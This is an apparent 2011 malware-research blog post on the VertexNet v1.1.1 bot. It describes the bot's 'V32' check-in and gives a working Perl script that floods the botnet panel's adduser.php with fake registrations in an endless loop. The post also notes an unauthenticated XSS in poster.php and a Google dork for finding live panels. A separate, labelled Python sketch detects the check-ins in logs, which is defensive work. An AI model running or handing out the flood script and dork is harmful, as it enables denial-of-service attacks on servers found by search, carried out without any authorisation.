Tuesday 17 May 2011

VertexNet v1.1.1 Loader Vulnerabilities

On the 15th I saw this sample: http://vxvault.siri-urz.net/ViriFiche.php?ID=9330

It appears to be a VertexNet bot after a short analysis.

VertexNet v1.1.1 Builder:

The malware calls home with 'V32' as user-agent:

Task check

I will not do a full analysis, but it's relatively simple to understand how it works.
If you want to start in malware reversing, I think VertexNet 1.1.1 is a good exercise.

Well, to return to the original subject: adduser.php is not protected against flood attacks.
So here is a short Perl script to exploit that:

# VertexNet v1.1.1 Flood Bots
# http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791
# Xyl2k! :þ

use HTTP::Request;
use LWP::UserAgent;

# Target panel
$URL = "http://localhost/Panel/adduser.php";

# Same user-agent as the bot's call home
$useragent = LWP::UserAgent -> new();
$useragent -> agent('V32');

# Counter of accepted requests
$try = 0;

while (1)
{
        # Random uid for each request
        $rnd = rand();

        $request = HTTP::Request -> new(GET => $URL . '?uid={' . $rnd . '}&lan=!&country=Fran.ais%20(France)%20+33&cc=FR&idle=0&ver=v1337');
        $response = $useragent -> request($request);

        if ($response -> is_success)
        {
                print("[~] The fire day " . $try . "\n");
                $try++;
        }
}
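Seen from the defender's side, the check-in request used above (user-agent 'V32', GET to adduser.php with uid, lan, country, cc, idle and ver) is easy to pick out of web proxy logs. The Python sketch below is an added example, not code from the original post; it assumes logs in Combined Log Format, and the sample lines, hosts and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format (assumed log source, e.g. a web proxy or gateway).
LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Query parameters of the adduser.php check-in request shown in the post.
CHECKIN_PARAMS = {"uid", "lan", "country", "cc", "idle", "ver"}

def classify(line):
    """Return (source, [indicators]) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if m["ua"] == "V32":  # exact user-agent of the bot's call home
        reasons.append("ua=V32")
    parts = urlsplit(m["url"])
    params = set(parse_qs(parts.query, keep_blank_values=True))
    # Catches check-ins even when the user-agent has been changed.
    if parts.path.lower().endswith("/adduser.php") and CHECKIN_PARAMS <= params:
        reasons.append("adduser-checkin")
    return (m["src"], reasons) if reasons else None

def scan(lines):
    """Map each source host to the sorted indicators seen for it."""
    hits = {}
    for line in lines:
        res = classify(line)
        if res:
            hits.setdefault(res[0], set()).update(res[1])
    return {src: sorted(r) for src, r in hits.items()}

# Constructed sample data (documentation addresses, hypothetical hosts).
_FMT = '{ip} - - [17/May/2011:10:00:00 +0000] "GET {url} HTTP/1.1" 200 12 "-" "{ua}"'
_Q = "uid=%7B0.42%7D&lan=!&country=FR&cc=FR&idle=0&ver=v1.1.1"
_PANEL = "http://panel.example/Panel/adduser.php?"
SAMPLE = [
    _FMT.format(ip="192.0.2.10", url=_PANEL + _Q, ua="V32"),
    _FMT.format(ip="192.0.2.11", url=_PANEL + _Q, ua="Mozilla/5.0"),
    _FMT.format(ip="192.0.2.12", url="http://www.example/index.php?id=1", ua="Mozilla/5.0"),
    # Unrelated adduser.php without the bot's parameter set: not flagged.
    _FMT.format(ip="192.0.2.13", url="http://forum.example/adduser.php?name=bob", ua="Mozilla/5.0"),
]

if __name__ == "__main__":
    for src, reasons in scan(SAMPLE).items():
        print(src, ", ".join(reasons))
```
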

And poster.php also appears vulnerable to XSS (without being logged into the C&C).

VertexNet panels can easily be dorked in Google, something like intitle:"VertexNet v1.1"+intext:"Username :"
Who wants to send abuse? :)

To finish, here is the music of the builder :þ
